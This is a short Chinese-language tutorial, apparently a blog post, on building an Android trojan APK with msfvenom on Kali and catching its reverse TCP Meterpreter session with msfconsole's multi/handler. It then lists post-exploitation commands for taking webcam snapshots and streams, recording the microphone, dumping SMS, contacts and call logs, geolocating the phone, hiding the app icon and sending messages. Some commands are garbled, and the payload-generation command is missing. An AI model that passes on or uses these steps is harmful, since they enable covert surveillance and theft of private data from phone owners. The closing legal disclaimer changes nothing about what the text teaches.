手机木马

kali⽣成⽊马⼊侵安卓⼿机

安卓⼿机随处可见，⼿机的私密性，安全性成为关键，本⽂将在理想环境下，介绍如何利⽤kali⼊侵⼀部安卓⼿机。

废话不说，教程开始！

1.打开终端提⽰符下输⼊以下命令，使⽤msfvenom⼯具来创建有效载

荷APK⽂件（⽣成apk⽊马程序）。

（1）

代码注释：

*LHOST:本机IP

*LPORT：这的5555是随意的端⼝，可以⾃⼰更改

*/root/(追加到指定的路径⽣成⽂件)

2.将⽊马安装到⼿机上（我直接⽤⾃⼰⼿机测试学习）

（2）

3.启动msf,msfconsole输⼊命令

>uexploit/multi/handler//加载模块

>tpayloadandroid/meterpreter/rever_tcp//选择Payload

#修改Ip和端⼝

>tLHOST192.168.43.18//Ip设置为本机ip

>tLPORT5555//端⼝设置为配置的本地端⼝

>exploit//开始监听，等待⽊马响应

红⾊框出的地⽅就说明⼿机上线了然后可以输⼊sysinfo查看⼿机信息了。

（3）

4.接下来是⼀些常⽤命令

Stdapi:WebcamCommands

===================================

webcam_list列出⽹络摄像头

record_mic[ˈrekərd]/记录/从默认麦克风录制⾳频为X秒

webcam_chat开始视频聊天

webcam_snap从指定的摄像头获取快照

webcam_stream-i1从指定的⽹络摄像头播放视频流[选择后摄像头]

AndroidCommands

=================

activity_start从URI字符串启动Android活动

check_root检查设备是否有根

dump_calllog获取调⽤⽇志

dump_contacts获取联系⼈列表

dump_sms获取短信

geolocate利⽤地理定位获取当前LAT

wlan_geolocate利⽤WLAN信息获取当前LAT

hide_app_icon从发射器隐藏应⽤程序图标

interval_collect管理区间收集能⼒

nd_sms从⽬标会话发送短消息

t_audio_mode

sqlite_query从存储库查询SQLite数据库

wakelock启⽤/禁⽤Wakelock

好了，教程到此结束了，教程只是引导，真的技术还需要⾃⼰去亲⾃实践。

（注意：凡未经他⼈同意，⾮法侵⼊，窃取他⼈信息的⽹络⾏为，都是违法犯罪⾏为）